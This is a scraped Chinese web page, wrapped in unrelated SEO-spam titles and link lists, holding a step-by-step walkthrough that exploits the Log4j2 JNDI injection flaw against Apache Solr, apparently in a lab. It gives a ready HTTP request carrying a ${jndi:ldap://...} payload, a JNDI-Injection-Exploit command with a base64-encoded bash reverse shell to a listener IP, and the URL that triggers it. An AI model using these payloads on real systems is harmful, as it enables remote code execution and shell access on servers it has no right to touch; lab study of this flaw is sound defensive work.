当前位置: 首页 > news >正文

私人让做彩票网站吗新航道培训机构怎么样

私人让做彩票网站吗,新航道培训机构怎么样,个人简历模板word格式免费下载,美工设计培训网Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。…

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

1.服务启动后,访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。

2.`${jndi:dns://${sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

3.我们可以在DNS日志平台收到相关日志,显示出当前Java版本:

4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell,

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.64.43"

访问下面链接,成功反弹

http://192.168.188.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.64.43:1389/08zqfe}

参考:hrrps://blog.csdn.net/Bossfrank/article/details/130148819

http://www.zhongyajixie.com/news/48879.html

相关文章:

  • 网龙沧州网站制作成都网站优化公司
  • 顺德网站制作案例价位seo建设招商
  • 零食铺网站建设策划书小璇seo优化网站
  • 贺州网站建网址关键词查询网站
  • 做网站客户要求分期公司网站模板
  • 重庆网站建设公司 网络营销学什么内容
  • iis7 发布asp网站404北京网站优化效果
  • 电子商务是学什么北京网站优化页面
  • 做网站用什么格式做好电商运营推广怎么做
  • 医疗软件网站建设网店代运营一年的费用是多少
  • iis 网站权限口碑营销策略有哪些
  • 建设网站书籍短视频搜索seo
  • 礼品做便宜的网站seo实战密码电子书
  • 做网站的服务器有哪些郑州网络推广哪家口碑好
  • wordpress运行加速上海网站seoseodian
  • 门户网站建设自查整改高级搜索入口
  • 男女做污的事情网站免费推广软件哪个好
  • 虹口区网站开发郑州企业网站优化排名
  • 关于网站的ppt怎么做广州线上教学
  • 政府网站建设和服务产品推广ppt范例
  • 南通网站建设机构百度咨询
  • 建站公司网站模板兰州seo外包公司
  • 网站建设初期新闻博客软文自助推广
  • 济南网站哪家做的好企业网络营销策划案
  • 坂田的做网站公司最好的免费信息发布平台
  • 万网站长工具电话营销系统
  • html教程软件佛山网站优化
  • 10G网站空间沈阳网络seo公司
  • 做个人网站要多少钱seo推广 课程
  • 如何做营销推广优化设计答案五年级上册